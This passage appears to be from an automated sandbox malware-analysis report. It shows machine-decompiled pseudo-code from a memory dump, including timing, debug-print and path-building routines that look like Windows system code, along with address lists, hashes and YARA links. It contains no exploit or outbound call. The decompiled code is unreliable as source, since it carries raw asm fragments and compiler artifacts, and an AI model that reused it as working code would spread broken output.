				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E030E7D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E03198F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0310AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x31b8628; // 0x0
								_v68 = _t77;
								_t78 =  *0x31b862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x31b8628; // 0x0
							_t116 =  *0x31b862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}
















































                                                                                                                                                    0x030eb94c
                                                                                                                                                    0x030eb956
                                                                                                                                                    0x030eb95c
                                                                                                                                                    0x030eb95e
                                                                                                                                                    0x030eb964
                                                                                                                                                    0x030eb969
                                                                                                                                                    0x030eb96d
                                                                                                                                                    0x030eb96d
                                                                                                                                                    0x030eb970
                                                                                                                                                    0x030eb974
                                                                                                                                                    0x030eb97a
                                                                                                                                                    0x030ebadf
                                                                                                                                                    0x030ebadf
                                                                                                                                                    0x030ebae2
                                                                                                                                                    0x030ebae4
                                                                                                                                                    0x030ebae6
                                                                                                                                                    0x030ebaf0
                                                                                                                                                    0x03132cb8
                                                                                                                                                    0x030ebaf6
                                                                                                                                                    0x030ebaf6
                                                                                                                                                    0x030ebaf6
                                                                                                                                                    0x030ebafd
                                                                                                                                                    0x030ebb1f
                                                                                                                                                    0x030ebb1f
                                                                                                                                                    0x030ebaff
                                                                                                                                                    0x030ebb00
                                                                                                                                                    0x030ebb00
                                                                                                                                                    0x030ebb03
                                                                                                                                                    0x030ebb03
                                                                                                                                                    0x030ebacb
                                                                                                                                                    0x030ebacf
                                                                                                                                                    0x030ebad0
                                                                                                                                                    0x030ebad1
                                                                                                                                                    0x030ebadc
                                                                                                                                                    0x030ebadc
                                                                                                                                                    0x030eb980
                                                                                                                                                    0x030eb980
                                                                                                                                                    0x030eb988
                                                                                                                                                    0x030eb98b
                                                                                                                                                    0x030eb98d
                                                                                                                                                    0x030eb990
                                                                                                                                                    0x030eb993
                                                                                                                                                    0x030eb999
                                                                                                                                                    0x030eb99b
                                                                                                                                                    0x030eb9a1
                                                                                                                                                    0x030eb9a5
                                                                                                                                                    0x030eb9aa
                                                                                                                                                    0x030eb9b0
                                                                                                                                                    0x030eb9bb
                                                                                                                                                    0x030eb9c0
                                                                                                                                                    0x030eb9c3
                                                                                                                                                    0x030eb9ca
                                                                                                                                                    0x030eb9cc
                                                                                                                                                    0x030eb9cf
                                                                                                                                                    0x030eb9d3
                                                                                                                                                    0x030eb9d7
                                                                                                                                                    0x030eba94
                                                                                                                                                    0x030eba94
                                                                                                                                                    0x030eba98
                                                                                                                                                    0x030ebaa3
                                                                                                                                                    0x03132ccb
                                                                                                                                                    0x030ebaa9
                                                                                                                                                    0x030ebaa9
                                                                                                                                                    0x030ebaa9
                                                                                                                                                    0x030ebab1
                                                                                                                                                    0x03132cd5
                                                                                                                                                    0x03132cdd
                                                                                                                                                    0x03132cdd
                                                                                                                                                    0x030ebabb
                                                                                                                                                    0x030ebabc
                                                                                                                                                    0x030ebac2
                                                                                                                                                    0x030ebac3
                                                                                                                                                    0x030ebac3
                                                                                                                                                    0x030ebac6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eb9dd
                                                                                                                                                    0x030eb9dd
                                                                                                                                                    0x030eb9e7
                                                                                                                                                    0x030eb9e7
                                                                                                                                                    0x030eb9ec
                                                                                                                                                    0x030eb9ec
                                                                                                                                                    0x030eb9f1
                                                                                                                                                    0x030eb9f5
                                                                                                                                                    0x030eb9fa
                                                                                                                                                    0x030eba00
                                                                                                                                                    0x030eba0c
                                                                                                                                                    0x030eba10
                                                                                                                                                    0x030eba10
                                                                                                                                                    0x030eba12
                                                                                                                                                    0x030eba18
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ebb26
                                                                                                                                                    0x030ebb26
                                                                                                                                                    0x030eba1e
                                                                                                                                                    0x030eba1e
                                                                                                                                                    0x030eba23
                                                                                                                                                    0x030eba25
                                                                                                                                                    0x030eba2c
                                                                                                                                                    0x030eba30
                                                                                                                                                    0x030eba35
                                                                                                                                                    0x030eba35
                                                                                                                                                    0x030eba41
                                                                                                                                                    0x030eba46
                                                                                                                                                    0x030eba4c
                                                                                                                                                    0x030eba50
                                                                                                                                                    0x030eba54
                                                                                                                                                    0x030eba6a
                                                                                                                                                    0x030eba6e
                                                                                                                                                    0x030eba70
                                                                                                                                                    0x030eba74
                                                                                                                                                    0x030eba78
                                                                                                                                                    0x030eba7a
                                                                                                                                                    0x030eba7c
                                                                                                                                                    0x030eba8e
                                                                                                                                                    0x030eba90
                                                                                                                                                    0x030eba92
                                                                                                                                                    0x030ebb14
                                                                                                                                                    0x030ebb14
                                                                                                                                                    0x030ebb16
                                                                                                                                                    0x030ebb16
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030eba7c
                                                                                                                                                    0x030ebb0a
                                                                                                                                                    0x030ebb0d
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x030ebb0f

                                                                                                                                                    APIs
                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 030EB9A5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 885266447-0
                                                                                                                                                    • Opcode ID: af7b32457d15e20614b868880cd94ad89a750c7de0b6bdd6600d6bff12ef8ba6
                                                                                                                                                    • Instruction ID: 538076da40db9ebc063abba8e346711d7768c0baf5105fea5c357099af155d94
                                                                                                                                                    • Opcode Fuzzy Hash: af7b32457d15e20614b868880cd94ad89a750c7de0b6bdd6600d6bff12ef8ba6
                                                                                                                                                    • Instruction Fuzzy Hash: E0512971A0A345CFCB24DF29C48092AFBE9FB88610F18896EF5959B354D771E844CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030CB171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 78%
                                                                                                                                                    			E030CB171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
				intOrPtr* _t110;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;

				_t109 = __esi;
				_t108 = __edi;
				_t106 = __edx;
				_t95 = __ebx;
				_push(0x90);
				_push(0x319f7a8);
				E0311D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
				if(__edx == 0xffffffff) {
					L6:
					_t97 =  *((intOrPtr*)(_t114 - 0x78));
					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) != 0) {
						L3:
						L4:
						return E0311D130(_t95, _t108, _t109);
					}
					 *(_t97 + 0xfca) = _t65 | 0x00000002;
					_t108 = 0;
					_t109 = 0;
					_t95 = 0;
					__eflags = 0;
					while(1) {
						__eflags = _t95 - 0x200;
						if(_t95 >= 0x200) {
							break;
						}
						E0310D000(0x80);
						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
						_t108 = _t115;
						_t95 = _t95 - 0xffffff80;
						_t17 = _t114 - 4;
						 *_t17 =  *(_t114 - 4) & 0x00000000;
						__eflags =  *_t17;
						_t106 =  *((intOrPtr*)(_t114 - 0x84));
						_t110 =  *((intOrPtr*)(_t114 - 0x84));
						_t102 = _t110 + 1;
						do {
							_t85 =  *_t110;
							_t110 = _t110 + 1;
							__eflags = _t85;
						} while (_t85 != 0);
						_t111 = _t110 - _t102;
						_t21 = _t95 - 1; // -129
						_t86 = _t21;
						__eflags = _t111 - _t86;
						if(_t111 > _t86) {
							_t111 = _t86;
						}
						E0310F3E0(_t108, _t106, _t111);
						_t115 = _t115 + 0xc;
						_t103 = _t111 + _t108;
						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
						_t89 = _t95 - _t111;
						__eflags = _t89;
						_push(0);
						if(_t89 == 0) {
							L15:
							_t109 = 0xc000000d;
							goto L16;
						} else {
							__eflags = _t89 - 0x7fffffff;
							if(_t89 <= 0x7fffffff) {
								L16:
								 *(_t114 - 0x94) = _t109;
								__eflags = _t109;
								if(_t109 < 0) {
									__eflags = _t89;
									if(_t89 != 0) {
										 *_t103 = 0;
									}
									L26:
									 *(_t114 - 0xa0) = _t109;
									 *(_t114 - 4) = 0xfffffffe;
									__eflags = _t109;
									if(_t109 >= 0) {
										L31:
										_t98 = _t108;
										_t39 = _t98 + 1; // 0x1
										_t106 = _t39;
										do {
											_t69 =  *_t98;
											_t98 = _t98 + 1;
											__eflags = _t69;
										} while (_t69 != 0);
										_t99 = _t98 - _t106;
										__eflags = _t99;
										L34:
										_t70 =  *[fs:0x30];
										__eflags =  *((char*)(_t70 + 2));
										if( *((char*)(_t70 + 2)) != 0) {
											L40:
											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x64)) = 2;
											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
											 *(_t114 - 4) = 1;
											_push(_t114 - 0x74);
											L0311DEF0(_t99, _t106);
											 *(_t114 - 4) = 0xfffffffe;
											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
											goto L3;
										}
										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
										if(( *0x7ffe02d4 & 0x00000003) != 3) {
											goto L40;
										}
										_push( *((intOrPtr*)(_t114 + 8)));
										_push( *((intOrPtr*)(_t114 - 0x9c)));
										_push(_t99 & 0x0000ffff);
										_push(_t108);
										_push(1);
										_t101 = E0310B280();
										__eflags =  *((char*)(_t114 + 0x14)) - 1;
										if( *((char*)(_t114 + 0x14)) == 1) {
											__eflags = _t101 - 0x80000003;
											if(_t101 == 0x80000003) {
												E0310B7E0(1);
												_t101 = 0;
												__eflags = 0;
											}
										}
										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
										goto L4;
									}
									__eflags = _t109 - 0x80000005;
									if(_t109 == 0x80000005) {
										continue;
									}
									break;
								}
								 *(_t114 - 0x90) = 0;
								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
								_t91 = E0310E2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
								_t115 = _t115 + 0x10;
								_t104 = _t91;
								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
								__eflags = _t104;
								if(_t104 < 0) {
									L21:
									_t109 = 0x80000005;
									 *(_t114 - 0x90) = 0x80000005;
									L22:
									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
									L23:
									 *(_t114 - 0x94) = _t109;
									goto L26;
								}
								__eflags = _t104 - _t92;
								if(__eflags > 0) {
									goto L21;
								}
								if(__eflags == 0) {
									goto L22;
								}
								goto L23;
							}
							goto L15;
						}
					}
					__eflags = _t109;
					if(_t109 >= 0) {
						goto L31;
					}
					__eflags = _t109 - 0x80000005;
					if(_t109 != 0x80000005) {
						goto L31;
					}
					 *((short*)(_t95 + _t108 - 2)) = 0xa;
					_t38 = _t95 - 1; // -129
					_t99 = _t38;
					goto L34;
				}
				if( *((char*)( *[fs:0x30] + 2)) != 0) {
					__eflags = __edx - 0x65;
					if(__edx != 0x65) {
						goto L2;
					}
					goto L6;
				}
				L2:
				_push( *((intOrPtr*)(_t114 + 8)));
				_push(_t106);
				if(E0310A890() != 0) {
					goto L6;
				}
				goto L3;
			}






















                                                                                                                                                    0x030cb171
                                                                                                                                                    0x030cb171
                                                                                                                                                    0x030cb171
                                                                                                                                                    0x030cb171
                                                                                                                                                    0x030cb171
                                                                                                                                                    0x030cb176
                                                                                                                                                    0x030cb17b
                                                                                                                                                    0x030cb180
                                                                                                                                                    0x030cb186
                                                                                                                                                    0x030cb18f
                                                                                                                                                    0x030cb198
                                                                                                                                                    0x030cb1a4
                                                                                                                                                    0x030cb1aa
                                                                                                                                                    0x03124802
                                                                                                                                                    0x03124802
                                                                                                                                                    0x03124805
                                                                                                                                                    0x0312480c
                                                                                                                                                    0x0312480e
                                                                                                                                                    0x030cb1d1
                                                                                                                                                    0x030cb1d3
                                                                                                                                                    0x030cb1de
                                                                                                                                                    0x030cb1de
                                                                                                                                                    0x03124817
                                                                                                                                                    0x0312481e
                                                                                                                                                    0x03124820
                                                                                                                                                    0x03124822
                                                                                                                                                    0x03124822
                                                                                                                                                    0x03124824
                                                                                                                                                    0x03124824
                                                                                                                                                    0x0312482a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124835
                                                                                                                                                    0x0312483a
                                                                                                                                                    0x0312483d
                                                                                                                                                    0x0312483f
                                                                                                                                                    0x03124842
                                                                                                                                                    0x03124842
                                                                                                                                                    0x03124842
                                                                                                                                                    0x03124846
                                                                                                                                                    0x0312484c
                                                                                                                                                    0x0312484e
                                                                                                                                                    0x03124851
                                                                                                                                                    0x03124851
                                                                                                                                                    0x03124853
                                                                                                                                                    0x03124854
                                                                                                                                                    0x03124854
                                                                                                                                                    0x03124858
                                                                                                                                                    0x0312485a
                                                                                                                                                    0x0312485a
                                                                                                                                                    0x0312485d
                                                                                                                                                    0x0312485f
                                                                                                                                                    0x03124861
                                                                                                                                                    0x03124861
                                                                                                                                                    0x03124866
                                                                                                                                                    0x0312486b
                                                                                                                                                    0x0312486e
                                                                                                                                                    0x03124871
                                                                                                                                                    0x03124876
                                                                                                                                                    0x03124876
                                                                                                                                                    0x03124878
                                                                                                                                                    0x0312487b
                                                                                                                                                    0x03124884
                                                                                                                                                    0x03124884
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0312487d
                                                                                                                                                    0x0312487d
                                                                                                                                                    0x03124882
                                                                                                                                                    0x03124889
                                                                                                                                                    0x03124889
                                                                                                                                                    0x0312488f
                                                                                                                                                    0x03124891
                                                                                                                                                    0x031248e0
                                                                                                                                                    0x031248e2
                                                                                                                                                    0x031248e4
                                                                                                                                                    0x031248e4
                                                                                                                                                    0x031248e7
                                                                                                                                                    0x031248e7
                                                                                                                                                    0x031248ed
                                                                                                                                                    0x031248f4
                                                                                                                                                    0x031248f6
                                                                                                                                                    0x03124951
                                                                                                                                                    0x03124951
                                                                                                                                                    0x03124953
                                                                                                                                                    0x03124953
                                                                                                                                                    0x03124956
                                                                                                                                                    0x03124956
                                                                                                                                                    0x03124958
                                                                                                                                                    0x03124959
                                                                                                                                                    0x03124959
                                                                                                                                                    0x0312495d
                                                                                                                                                    0x0312495d
                                                                                                                                                    0x0312495f
                                                                                                                                                    0x0312495f
                                                                                                                                                    0x03124965
                                                                                                                                                    0x03124969
                                                                                                                                                    0x031249ba
                                                                                                                                                    0x031249ba
                                                                                                                                                    0x031249c1
                                                                                                                                                    0x031249c5
                                                                                                                                                    0x031249cc
                                                                                                                                                    0x031249d4
                                                                                                                                                    0x031249d7
                                                                                                                                                    0x031249da
                                                                                                                                                    0x031249e4
                                                                                                                                                    0x031249e5
                                                                                                                                                    0x031249f3
                                                                                                                                                    0x03124a02
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124a02
                                                                                                                                                    0x03124972
                                                                                                                                                    0x03124974
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124976
                                                                                                                                                    0x03124979
                                                                                                                                                    0x03124982
                                                                                                                                                    0x03124983
                                                                                                                                                    0x03124984
                                                                                                                                                    0x0312498b
                                                                                                                                                    0x0312498d
                                                                                                                                                    0x03124991
                                                                                                                                                    0x03124993
                                                                                                                                                    0x03124999
                                                                                                                                                    0x0312499d
                                                                                                                                                    0x031249a2
                                                                                                                                                    0x031249a2
                                                                                                                                                    0x031249a2
                                                                                                                                                    0x03124999
                                                                                                                                                    0x031249ac
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031249b3
                                                                                                                                                    0x031248f8
                                                                                                                                                    0x031248fe
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031248fe
                                                                                                                                                    0x03124895
                                                                                                                                                    0x0312489c
                                                                                                                                                    0x031248ad
                                                                                                                                                    0x031248b2
                                                                                                                                                    0x031248b5
                                                                                                                                                    0x031248b7
                                                                                                                                                    0x031248ba
                                                                                                                                                    0x031248bc
                                                                                                                                                    0x031248c6
                                                                                                                                                    0x031248c6
                                                                                                                                                    0x031248cb
                                                                                                                                                    0x031248d1
                                                                                                                                                    0x031248d4
                                                                                                                                                    0x031248d8
                                                                                                                                                    0x031248d8
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031248d8
                                                                                                                                                    0x031248be
                                                                                                                                                    0x031248c0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031248c2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031248c4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124882
                                                                                                                                                    0x0312487b
                                                                                                                                                    0x03124904
                                                                                                                                                    0x03124906
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124908
                                                                                                                                                    0x0312490e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124910
                                                                                                                                                    0x03124917
                                                                                                                                                    0x03124917
                                                                                                                                                    0x00000000
                                                                                                                                                    0x03124917
                                                                                                                                                    0x030cb1ba
                                                                                                                                                    0x031247f9
                                                                                                                                                    0x031247fc
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x031247fc
                                                                                                                                                    0x030cb1c0
                                                                                                                                                    0x030cb1c0
                                                                                                                                                    0x030cb1c3
                                                                                                                                                    0x030cb1cb
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000015.00000002.488413198.00000000030A0000.00000040.00000001.sdmp, Offset: 030A0000, based on PE: true
                                                                                                                                                    • Associated: 00000015.00000002.488921669.00000000031BB000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000015.00000002.488950768.00000000031BF000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _vswprintf_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 677850445-0
                                                                                                                                                    • Opcode ID: b0ad344c5cb58e6c785078333541e6cea26386bd2b7f488bbdc1b328f3b4d0af
                                                                                                                                                    • Instruction ID: 32d83e6006e22b6dafefe2b22ab0bd6e752f92c3cfbff618c425a2ced52e18af
                                                                                                                                                    • Opcode Fuzzy Hash: b0ad344c5cb58e6c785078333541e6cea26386bd2b7f488bbdc1b328f3b4d0af
                                                                                                                                                    • Instruction Fuzzy Hash: 6B51F075D142698FDF35CFAAC841BBEBFB0AF08710F1441ADEC59AB281DB7049518B90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 030F2581, Relevance: 1.6, Strings: 1, Instructions: 329COMMONCrypto
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                                    			E030F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, void* _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t232;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				intOrPtr _t248;
				signed int _t251;
				signed int _t258;
				signed int _t261;
				signed int _t269;
				intOrPtr _t275;
				signed int _t277;
				signed int _t279;
				signed int _t284;
				signed int _t285;
				unsigned int _t288;
				signed int _t292;
				void* _t293;
				signed int _t295;
				signed int _t299;
				intOrPtr _t311;
				signed int _t320;
				signed int _t322;
				signed int _t323;
				signed int _t327;
				signed int _t328;
				signed int _t331;
				signed int _t332;
				signed int _t334;
				signed int _t337;
				void* _t338;
				signed int _t342;
				void* _t343;

				_t334 = _t337;
				_t338 = _t337 - 0x4c;
				_v8 =  *0x31bd360 ^ _t334;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t327 = 0x31bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t288 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t343 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t275 = 0x48;
				_t309 = 0 | _t343 == 0x00000000;
				_t320 = 0;
				_v37 = _t343 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t275 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t328 = 0xc0000106;
						goto L32;
					} else {
						_t327 = L030E4620(_t288,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
						_v52 = _t327;
						__eflags = _t327;
						if(_t327 == 0) {
							_t328 = 0xc0000017;
							goto L32;
						} else {
							 *(_t327 + 0x44) =  *(_t327 + 0x44) & 0x00000000;
							_t50 = _t327 + 0x48; // 0x48
							_t322 = _t50;
							_t309 = _v32;
							 *((intOrPtr*)(_t327 + 0x3c)) = _t275;
							_t277 = 0;
							 *((short*)(_t327 + 0x30)) = _v48;
							__eflags = _t309;
							if(_t309 != 0) {
								 *(_t327 + 0x18) = _t322;
								__eflags = _t309 - 0x31b8478;
								 *_t327 = ((0 | _t309 == 0x031b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0310F3E0(_t322,  *((intOrPtr*)(_t309 + 4)),  *_t309 & 0x0000ffff);
								_t309 = _v32;
								_t338 = _t338 + 0xc;
								_t277 = 1;
								__eflags = _a8;
								_t322 = _t322 + (( *_t309 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t269 = E031539F2(_t322);
									_t309 = _v32;
									_t322 = _t269;
								}
							}
							_t292 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t328 = _v68;
								__eflags = 0;
								 *((short*)(_t322 - 2)) = 0;
								goto L32;
							} else {
								_t279 = _t327 + _t277 * 4;
								_v56 = _t279;
								do {
									__eflags = _t309;
									if(_t309 != 0) {
										_t232 =  *(_v60 + _t292 * 4);
										__eflags = _t232;
										if(_t232 == 0) {
											goto L30;
										} else {
											__eflags = _t232 == 5;
											if(_t232 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t279 =  *(_v60 + _t292 * 4);
										 *(_t279 + 0x18) = _t322;
										_t236 =  *(_v60 + _t292 * 4);
										__eflags = _t236 - 8;
										if(_t236 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t236 * 4 +  &M030F2959))) {
												case 0:
													__ax =  *0x31b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0310F3E0(__edi,  *0x31b848c, __ax & 0x0000ffff);
														__eax =  *0x31b8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0310F3E0(_t322, _v80, _v64);
													_t264 = _v64;
													goto L26;
												case 2:
													 *0x31b8480 & 0x0000ffff = E0310F3E0(__edi,  *0x31b8484,  *0x31b8480 & 0x0000ffff);
													__eax =  *0x31b8480 & 0x0000ffff;
													__eax = ( *0x31b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0310F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0310F3E0(_t322, _v76, _v36);
														_t264 = _v36;
													}
													L26:
													_t338 = _t338 + 0xc;
													_t322 = _t322 + (_t264 >> 1) * 2 + 2;
													__eflags = _t322;
													L27:
													_push(0x3b);
													_pop(_t266);
													 *((short*)(_t322 - 2)) = _t266;
													goto L28;
												case 6:
													__ebx =  *0x31b575c;
													__eflags = __ebx - 0x31b575c;
													if(__ebx != 0x31b575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0310F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x31b575c;
														} while (__ebx != 0x31b575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x31b8478 & 0x0000ffff = E0310F3E0(__edi,  *0x31b847c,  *0x31b8478 & 0x0000ffff);
													__eax =  *0x31b8478 & 0x0000ffff;
													__eax = ( *0x31b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E031539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x31b6e58 & 0x0000ffff = E0310F3E0(__edi,  *0x31b6e5c,  *0x31b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x31b6e58 & 0x0000ffff;
													__eax = ( *0x31b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t292 = _v16;
